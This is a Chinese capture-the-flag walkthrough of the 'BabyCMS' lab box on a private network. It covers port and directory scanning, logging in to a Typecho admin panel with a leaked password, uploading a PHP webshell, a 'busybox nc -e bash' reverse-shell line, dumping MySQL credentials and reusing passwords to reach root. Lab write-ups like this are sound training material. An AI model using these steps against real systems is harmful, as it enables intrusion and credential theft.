MazeSec BabyCMS
# 信息收集
# 存活主机发现与 ARP 扫描
┌──(npc㉿kali)-[~/hackmyvm/BabyCMS]
└─$ sudo arp-scan -I eth1 192.168.56.0/24
192.168.56.126 08:00:27:27:bb:b4 PCS Systemtechnik GmbH
1
2
3
4
2
3
4
# 端口扫描
TCP 全端口扫描
┌──(npc㉿kali)-[~/hackmyvm/BabyCMS]
└─$ nmap -p- -sT 192.168.56.126
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1
2
3
4
5
6
2
3
4
5
6
# 80 端口服务探测
有一个 Typecho 博客系统
尝试几次弱口令无果,gobuster 目录扫描
┌──(npc㉿kali)-[~/hackmyvm/BabyCMS]
└─$ gobuster dir -u http://192.168.56.126 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,asp,txt,bak
/setup.txt (Status: 200) [Size: 26]
1
2
3
4
2
3
4
访问 setup.txt,是 Typecho 的凭证信息
┌──(npc㉿kali)-[~/hackmyvm/BabyCMS]
└─$ curl http://192.168.56.126/setup.txt
pass:dyxBCEjovrUJa84sV03Q
1
2
3
2
3
# 后台getshell
首页有信息 可以确定存在用户 root,使用 root:dyxBCEjovrUJa84sV03Q 成功登录后台,设置允许php文件上传
文章上传php附件
域名替换为ip,访问webshell
反弹个shell到攻击机
busybox nc 192.168.56.126 -e bash
1
# 收集 mysql 凭证
查看当前开放的端口
www-data@BabyCMS:/var/www/html/usr/uploads/2025/11$ ss -tupln
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 128 *:80 *:*
1
2
3
4
5
6
7
2
3
4
5
6
7
找到 typecho 的配置文件 config.inc.php,查看 mysql 凭证
www-data@BabyCMS:/var/www/html/usr/uploads/2025/11$ cd /var/www/html
www-data@BabyCMS:/var/www/html$ ls
LICENSE.txt config.inc.php install setup.txt usr
admin index.php install.php typecho.zip var
www-data@BabyCMS:/var/www/html$ cat config.inc.php
// config db
$db = new \Typecho\Db('Pdo_Mysql', 'typecho_');
$db->addServer(array (
'host' => 'localhost',
'port' => 3306,
'user' => 'pagekit_user',
'password' => 'your_secure_password',
'charset' => 'utf8mb4',
'database' => 'pagekit',
'engine' => 'InnoDB',
'sslCa' => NULL,
'sslVerify' => false,
), \Typecho\Db::READ | \Typecho\Db::WRITE);
\Typecho\Db::set($db);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# mysql 信息收集
使用收集到的 mysql 凭证登录 mysql,可以在 pagekit.typecho_userlist表里找到一个疑似 caigou 用户的凭证
MariaDB [pagekit]> select * from typecho_userlist;
+----+--------+----------------------+
| id | name | pass |
+----+--------+----------------------+
| 1 | caigou | dRfGtYhUjIkOlPqAeRtY |
| 2 | user1 | aBcDeFgHiJkLmNoPqRsT |
| 3 | user2 | cNNloFLE88YBIP4ZJfcy |
| 4 | user3 | xYzAbCdEfGhIjKlMnOpQ |
| 5 | user4 | pLmOkNjIbHvGcFxDrEsW |
| 6 | user5 | wVxYzAbCdEfGhIjKlMnO |
| 7 | user6 | sTrUvWxYzAbCdEfGhIjK |
| 8 | user7 | qWeRtYuIoPaSdFgHjKlZ |
| 9 | user8 | mNbVcXzAsDfGhJkLpOqR |
| 10 | user9 | kJiHgFdSaPqOwNeMtBuV |
+----+--------+----------------------+
10 rows in set (0.000 sec)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
使用 caigou:dRfGtYhUjIkOlPqAeRtY 登录 ssh,密码错误
测试 caigou 用户与其他密码组合时,在caigou:cNNloFLE88YBIP4ZJfcy 时成功登录 ssh
# 密码复用
尝试使用 caigou 用户凭证登录 root ,成功登录root
编辑 (opens new window)
最后一次更新于: 2025/11/11, 13:33:05